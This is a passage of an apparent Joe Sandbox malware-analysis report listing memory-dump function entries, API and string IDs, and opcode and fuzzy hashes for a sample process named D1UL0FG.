                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                                                          • Instruction ID: 1d917f13ee69e1b3a437342bec29457ba60b02bf815dc72084d3c3190bea1fdb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccac5f17aa91da4f3bae42de7e7333904383ed8f97faa160faf07aaa8124ee46
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8114F23A3D64682FA58B725A55127963915F847B0F4483B4E97DC76F6EF2CA801A301
                                                                                                                                                                                                                                          Function 00007FF8A92E21C1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 355COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
                                                                                                                                                                                                                                          • API String ID: 3535234312-1441847574
                                                                                                                                                                                                                                          • Opcode ID: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                                                                                                                                                                                                          • Instruction ID: 71da4d4a50296c2bc98efed0c59985ac748500e1dacac33ff74a48458ccc273c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2a1fe7ef8bbf980694a84b1801f65fd6b1e6e9000ff944b82d81e57b58df6bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F19832A0EAC195EB208F1AE4853A9BBB5FB94BC4F049135DA8D87795DF7DE580C700
                                                                                                                                                                                                                                          Function 00007FF8A9314EF0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: $..\s\ssl\ssl_sess.c$T
                                                                                                                                                                                                                                          • API String ID: 3535234312-2024727245
                                                                                                                                                                                                                                          • Opcode ID: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                                          • Instruction ID: 6eafb82b2fa5beacf5ab01b5025083faaebd1b4145ae6de713f54de044b4afc7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C19B32A0EAC2A2EB659F26D8547F927A1EB84BC4F145035DE1D8B7A5EF3CE541C700
                                                                                                                                                                                                                                          Function 00007FF67AEEFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction ID: db7d6e1f5c1a643dc1519314539446ccaa9f6f0f31b074e72d4fdf170bbecf2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05819D33E2C24285F7646F2981503793BA0AB11B58FE580B5DA0DD72BADF2DF901E701
                                                                                                                                                                                                                                          Function 00007FF8A8631FA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3002205748.00007FF8A8631000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FF8A8630000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002160686.00007FF8A8630000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8694000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A86E3000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A873C000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8741000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002205748.00007FF8A8744000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002828639.00007FF8A8745000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002876682.00007FF8A8747000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a8630000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C6126570
                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                          • API String ID: 800424832-87138338
                                                                                                                                                                                                                                          • Opcode ID: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                                                                                                                                                                                                          • Instruction ID: e26d115abbbd81b7980b6ce1885f9e03e3487c0964a51a2c6e8296169f755039
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8e681eb15480172cfe4a28a3257cda92461c1a9f1febbdb02df2df24e1a544b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40614932B1A20266F6608A19E5087BA7392FF80BD1F446235E96D477C9DF3CE409C714
                                                                                                                                                                                                                                          Function 00007FF67AEEF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                                                                                                                          • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction ID: 10c56d16edc8ce774b309087459a0f5709734dadeac67502bc7988c8abfcf43d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1510473F2C2158AFB24EF6499616BC37A1AB40358F914279DE1ED2AF5DF38A4029700
                                                                                                                                                                                                                                          Function 00007FF67AEF5B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: ?
                                                                                                                                                                                                                                          • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                          • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                          • Instruction ID: 07ca307dfe24972e1085f23b7e02e2018b70b1bf25b10b42bbcecd75f8bde3c8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA412813A2C78242FBA4AB25F40137A6790EBA0BA4F144279EE5D87AF5DF3DD541DB00
                                                                                                                                                                                                                                          Function 00007FF8A92E23C4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007B911
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_clnt.c
                                                                                                                                                                                                                                          • API String ID: 2143881289-592572767
                                                                                                                                                                                                                                          • Opcode ID: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                                                                                                                                                                                                          • Instruction ID: c5b1fac7c1b057711348db01dbf16ce5177fbad6db66578eb1f653be333b1ddb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2277d602e12e024388a9d4cef9287e1d4121b4c948b8fb80c28345a1f791c9cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA419D7270EAC196EB608F15E5402AD67B4FB44BC4F685032DB4C87BA9EF7DD5A18700
                                                                                                                                                                                                                                          Function 00007FF67AEECCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                          • String ID: U
                                                                                                                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                          • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction ID: 36159fc43ec5a3f4997be3bbefe2bca9038f51860b30d1743edf442ec718850a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8241C373B28A8585EB609F65E4443BA6760FB88794F404035EE4DC7BA8EF3DD451DB40
                                                                                                                                                                                                                                          Function 00007FF8A92E6540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction ID: 0d0638d31299d4ac5681b764cb2292416960e42a5d496324ec31ac030e45157b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F721C172A1968796EF948F2DE484379BAE0EB88BD8F449035DA6DC7758EE3CD0408700
                                                                                                                                                                                                                                          Function 00007FF8A92E175D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007B911
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$3
                                                                                                                                                                                                                                          • API String ID: 2143881289-3555168737
                                                                                                                                                                                                                                          • Opcode ID: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                                                                                                                                                                                                          • Instruction ID: 1b469547e59312e13cbec6e6cc6bb73bebf5a9749b6bb2ecddcb0896b05eae26
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6321AB3270EA8196E7508F10E8803AC63A4E749BC4F585131DA4C8BB99DE7DD690C700
                                                                                                                                                                                                                                          Function 00007FF8A92E6FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File
                                                                                                                                                                                                                                          • String ID: gfff
                                                                                                                                                                                                                                          • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                          • Opcode ID: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                                          • Instruction ID: 4e1f58f5d8c545570e3f13a82bfd64df253f54345614e793646c03fb702d81ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A001DBE2B1998552EF60DF39F841165A7E0E7CC7C4B449031EB5DCBB69EE2CD1418700